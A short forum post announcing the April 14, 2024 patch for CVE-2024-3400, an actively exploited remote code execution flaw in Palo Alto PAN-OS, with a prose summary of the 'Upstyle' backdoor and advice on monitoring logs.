Palo Alto Zero-Day ...
 
Notifications
Clear all

Palo Alto Zero-Day patch download on April 14 2024

1 Posts
1 Users
0 Reactions
152 Views
Brandon Lee
(@brandon-lee)
Posts: 554
Member Admin
Topic starter
 

Security researchers have discovered a zero-day vulnerability in Palo Alto Networks firewalls. The vulnerability is identified as CVE-2024-3400 and has been actively exploited since March 26, 2024, by suspected state-sponsored hackers. It is an unauthenticated remote code execution flaw that affects the PAN-OS software. It compromises network security by enabling attackers to breach networks, steal data, and escalate their access. 

Palo Alto Networks has scheduled patches for release on April 14. In the interim, the company has issued mitigations to help protect users' systems. The exploitation of the vulnerability was first detected by Volexity in the GlobalProtect feature of PAN-OS.

Hackers have installed a custom Python backdoor named 'Upstyle' on compromised devices, which allows for command execution and data theft from internal networks. The backdoor manipulates the system path file to execute commands each time Python starts. Then the commands are retrieved from web server error logs encoded in base64.

This is a worrying trend of targeting network devices. These are often less protected and directly accessible from the internet. Volexity's ongoing investigation has revealed that this attack is likely the work of a sophisticated, resource-rich state-backed actor, given the complexity and stealthiness of the exploitation.

Companies need to monitor network activity and analyze logs for anomalies, alongside generating Tech Support Files for forensic investigation.

In checking your Palo Alto firewall, you will see updates listed for 4/14/2024:

image
 
Posted : 14/04/2024 9:42 pm